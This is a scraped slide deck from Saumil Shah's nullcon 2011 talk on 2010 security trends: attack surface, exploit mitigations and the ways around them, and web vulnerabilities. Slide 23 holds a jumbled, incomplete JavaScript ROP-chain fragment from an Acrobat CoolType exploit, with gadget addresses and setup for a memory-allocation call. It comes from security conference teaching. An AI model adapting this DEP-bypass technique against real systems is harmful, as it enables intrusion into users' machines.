Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

nullcon 2011 - Lessons learned from 2010


Published on

Lessons learned from 2010 by Saumil Shah

Published in: Technology
  • Be the first to comment

  • Be the first to like this

nullcon 2011 - Lessons learned from 2010

  1. 1. 2010: A Net Odyssey Saumil Shah nullCON Goanet-square 26.02.2011 n|u dwitiya
  2. 2. Welcome to NullCON!net-square | n|u dwitiya
  3. 3. # who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% (" )*+ ,"net-square n|u dwitiya
  4. 4. What! did we! learn from! ?!net-square n|u dwitiya
  5. 5. net-square n|u dwitiya
  6. 6. Attack Surfacenet-square n|u dwitiya
  7. 7. ATTACK SURFACE 2010-2011 5net-square n|u dwitiya
  8. 8. Wider Attack Surface 5net-square n|u dwitiya
  9. 9. Ease of Exploitation 5net-square n|u dwitiya
  10. 10. Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. tracknet-square n|u dwitiya
  11. 11. Complexity... 5 neve seen r befo re!net-square n|u dwitiya
  12. 12. A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com putersnet-square n|u dwitiya
  13. 13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Pluginsnet-square n|u dwitiya
  14. 14. Exploit Mitigation Techniquesnet-square n|u dwitiya
  15. 15. /GS SafeSEH DEP ASLRPermanent DEPASLR and DEP net-square n|u dwitiya
  16. 16. /GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap SpraysPermanent DEP ROPASLR and DEP JIT Sprays net-square n|u dwitiya
  17. 17. Its SPLOIT TIME! net-square n|u dwitiya
  18. 18. Jedi A/V Tricks These are not the sploitz youre looking n|u dwitiya
  19. 19. Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploitnet-square n|u dwitiya
  20. 20. High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricksnet-square n|u dwitiya
  21. 21. This iz what ?net-square n|u dwitiya
  22. 22. Im an evil Javascript Im an innocent imagenet-square n|u dwitiya
  23. 23. function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u" (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS>net-square n|u dwitiya
  24. 24. Server Side Vulnerabilitiesnet-square n|u dwitiya
  25. 25. SQL injection XSS CSRF RFI/LFIInput tamperingnet-square n|u dwitiya
  26. 26. Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerfulnet-square n|u dwitiya
  27. 27. W3C"I dont think its ready for production yet," especially since W3C still willmake some changes on APIs, said Le Hegaret. "The real problem is can wemake HTML5 work across browsers and at the moment, that is not thecase." [6th October 2010] net-square n|u dwitiya
  28. 28. Application Delivery Authentication Statefulness Data Typing Non-mutablenet-square n|u dwitiya
  29. 29. The Web Application at present DeliveryHTTP AJAX AuthenticationHTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
  30. 30. The FUTURE is HERE!net-square n|u dwitiya
  31. 31. No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfarenet-square n|u dwitiya
  32. 32. The Solution?net-square n|u dwitiya
  33. 33. Keep on patching!net-square n|u dwitiya
  34. 34. I can haz sandbox I Also Can!net-square n|u dwitiya
  35. 35. The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Appsnet-square n|u dwitiya
  36. 36. n|u dwitiyakthxbai n|u dwitiya